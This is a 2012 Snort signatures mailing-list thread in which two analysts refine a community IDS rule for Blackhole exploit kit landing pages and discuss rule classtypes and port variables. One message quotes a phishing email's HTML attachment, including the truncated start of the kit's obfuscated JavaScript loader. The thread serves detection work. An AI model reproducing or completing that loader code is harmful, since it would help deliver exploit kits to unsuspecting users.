[Snort-sigs] Proposed Signature - "COMMUNITY SPECIFIC-THREATS High Probability Blackhole Landing with catch qq"

Matt Olney molney at ...435...
Thu Mar 1 09:45:47 EST 2012


Nathan, Got an email entitled:

Fwd: Your Flight N 91-17249698
It had an attached html file with the following html (recognize it? :))

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "
http://www.w3.org/TR/html4/loose.dtd">
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  *<title>Please wait untill the page loads...</title>*
 </head>
 <body>
<h1>Please Wait... Loading... </h1><br>
 </body>`

<script>if(window['doc'+'ume'+'nt'])aa=/\w/.exec(1).index+[];aaa='0';try{new
locat*ion();}catch(qqq){ss*=String;if(aa

Etc...

Good rule :)

Matt

On Wed, Feb 29, 2012 at 4:35 PM, Community Signatures
<lists at ...3397...>wrote:

> On 02/29/12 15:19, Matt Olney wrote:
> > Since you're associating with an exploit kit, rather than an active
> > trojan, and given that exploits are typically aimed at user
> > applications, I'd use classtype:attempted-user;
>
> Understood, on the ET side we tend to use trojan-activity because the
> point of the exploit kit is to install a trojan/malware.  I always
> viewed attempted-user as privilege escalation.  I may just leave
> classtype off and let VRT apply this and the metadata as they feel fit.
>
> > Because it is a file, and you're not using any http_inspect buffers,
> > we'd use $FILE_DATA_PORTS in case it is delivered via mail (saw one like
> > that yesterday).
>
> Thanks Matt, can you elaborate more on this as I've not seen this
> behavior before, where Blackhole is delivered via mail.  I have seen
> mailing campaigns that include a link which, upon landing, is Blackhole.
>  I don't disagree with your changes over $HTTP_PORTS but I have not seen
> this behavior especially with SMTPDs
>
> > Again, primarily cosmetic changes, and does nothing, in this simple
> > case, to modify the functionality of the rule.
>
> Thank you for taking the time to explain the changes and current
> convention.
>
> Thanks,
> Nathan
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20120301/25988b06/attachment.html>


More information about the Snort-sigs mailing list